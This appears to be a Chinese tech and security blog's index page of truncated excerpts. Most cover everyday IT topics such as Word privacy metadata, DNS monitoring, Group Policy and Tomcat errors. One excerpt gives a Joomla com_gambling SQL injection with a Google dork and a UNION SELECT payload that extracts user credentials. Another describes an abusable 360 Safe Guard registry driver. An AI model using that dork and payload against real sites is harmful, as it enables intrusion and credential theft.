phpzip

像phpspy不能打包压缩目录也不能压缩成文件,它是在内存里直接下载,而且也不具备排除功能。

本程序能打包目录及子目录, 能排除指定的文件类型, 不仅能直接生成zip下载, 而且可以在文件系统里生成zip文件包。

下载地址:http://www.t00ls.net/attachment.php?aid=NDcyMXxmYmM1MzRjNnwxMjY1MjY1OTUwfGI5MTdDUUJpamxvTlRNVHFOcU8rTEYvN1RtcUo0amZibGtpc0hXSSswcjAvSFBj

...

标签:

别让Word 2007泄漏自己的隐私

你是否注意到,我们常用的Word、Excel等文档会泄漏创建者的隐私信息,比如打开一篇Word文件,点击Office按钮,选择“准备→属性→高级属性”,这篇文档的作者、单位等信息就一览无余了。另外,有经验的计算机用户还可以通过Word的批注、修订等获得创建者的一些信息,这些批注和修订显示了参与修改这篇文档所有人员的姓名。 如果你不想公开自己的信息,可以在共享自己创建的文档之前删除隐藏在文档中的隐私信息。
    1. 打开要检查是否存在隐藏数据和个人信息的 Word 文档。
...

标签:

Joomla (com_gambling) SQL Injection Vulnerabilities

google: inurl:com_gambling

Exploit:
-9999+union+select+1,concat(username,0x3a,password)+from+mos_users/*

利用:http://www.Site.com/index.php?option=com_gambling&Itemid=64&task=showGame&gamblingSid \
...

标签:

360安全卫士是在中国广泛使用的免费上网安全软件。

360安全卫士会在安装过程中在用户系统上安装一个注册表操作程序,该程序可以被用来绕过操作系统的安全检查机制任意操作(设置、删除等)用户的注册表。由于该程序没有对调用者进行检查,导致任意程序(如各种木马程序等)可以通过该后门任意操作(设置、删除等)用户的注册表系统。

该程序包括两个文件:

1. bregdrv.sys:内核模式驱动,该驱动程序通过调用操作系统的未公开CmXxx系列函数来操作注册表,另外由于操作系统内部本身维护了很多同步数据、缓存数据,直接调用CmXxx系列函数操作注册表极有可能造成系统内部数据不同步,严重影响系统安全性,甚至可能导致用户正常数据丢失。

...

标签:

使用snmp对DNS服务器进行图形化监控

通常情况下如果需要了解DNS服务器的工作状态往往需要telnet或ssh到服务器上以命令的方式来获取。该方式不但麻烦而且不直观。本文介绍一种通过SNMP来对DNS服务器进行图形化监控的方法。
该系统主要是基于Cacti,由于cacti在网络监控中应用很多,这里对其安装配置不做介绍。Cacti本身不支持监控DNS的功能,首先下载Cacti的一个工具包,下载地址如下
http://uversaconsulting.net/download/bind9-stats-1.0.tar.gz
...

标签:

电邮软件新秀——IncrediMail

IncrediMail是一款别具一格的email软件,不仅具有传统email软件的基本功能,还具有非常酷的界面、寄信动画效果、可爱的收信邮差,还有很多的信笺、动画、音效、电子卡片等,可以组合出非常炫的电子邮件,让写E-mail和收E-mail都变成一种心动的体验。 

IncrediMail是一款共享软件,下载网址:http://www.incredimail.com/。IncrediMail的窗口的布局与网友们常用的OutlookExpress和Foxmail基本相同,不同的是在窗口的右上方有一个深蓝色的状态窗口,在普通情况下它显示当前的时间和日期,而当收发电子邮件的时候,就用它来显示邮件收发过程的进度。下面就向大家介绍一下它的超炫的特性及使用:
...

标签:

十种攻击行为,您能顶住几个?

近几年,互联网的应用呈现出一种爆发增长的态势,网速越来越快,能够遍寻的软件越来越多,初级黑客凭借一些入门的教程和软件就能发起简单的攻击;另一方面,电脑的价格持续下降,企业内部的终端数量也在逐步增加,更多的资源,更复杂的网络使得IT运维人员在管控内网时心力交瘁,面对这些内忧外患,我们不得不重新审视网络安全问题。
下面,我们将介绍一些攻击行为案例,对于这些行为不知您是否遇到过?您的网络是否能够抵挡住这些攻击?您都做了哪些防范?如果对于攻击行为您并没有全面、细致、合规的操作不妨看看我们的建议和意见吧。

...

标签:

谈组策略禁移动设备

组策略是一个管理用户工作环境的技术,通过它可以确保用户拥有所需的工作环境,也可以通过它来限制用户,这不仅让用户拥有适当的环境,也减轻了系统管理员的管理负担。     
在Windows 2000/XP/2003等操作系统目录中包含了几个 .adm 文件。这些文件是文本文件,称为“管理模板”,它们为组策略管理模板项目提供策略信息。虽然它们已经定制了许多策略用来完善管理员的日常操作,很可惜并没有将移动设备(指U盘/光驱/A驱等)列入到管理模板中,使现实环境中管理员对移动设备的管控成了很头痛的一件事。那么我们能否通过自建一个策略生成管理模板呢?答案是肯定的。接下来,我们将通过一个完整的实例来说明。
...

标签:

Apache Tomcat 服务因 0 (0x0) 服务性错误而停止

Tomcat 服务性错误而停止

操作系统:Windows Server 2003 SP2
JDK 版本为 6.0 update 6 安装在 D:\Java 目录下
Tomcat 版本为 6.0.16 安装 D:\Tomcat 目录下
故障描述:成功安装后 Tomcat 无法启动
日志错误:Apache Tomcat 服务因 0 (0x0) 服务性错误而停止
...

标签:

Ubuntu中7zip解压缩rar的问题

如果在Ubuntu中使用7zip解压缩rar格式的文件,却出现“unsupported method”的错误信息,可以使用“系统/管理/synaptic软件管理程序/新增7zip-rar”解决。

标签: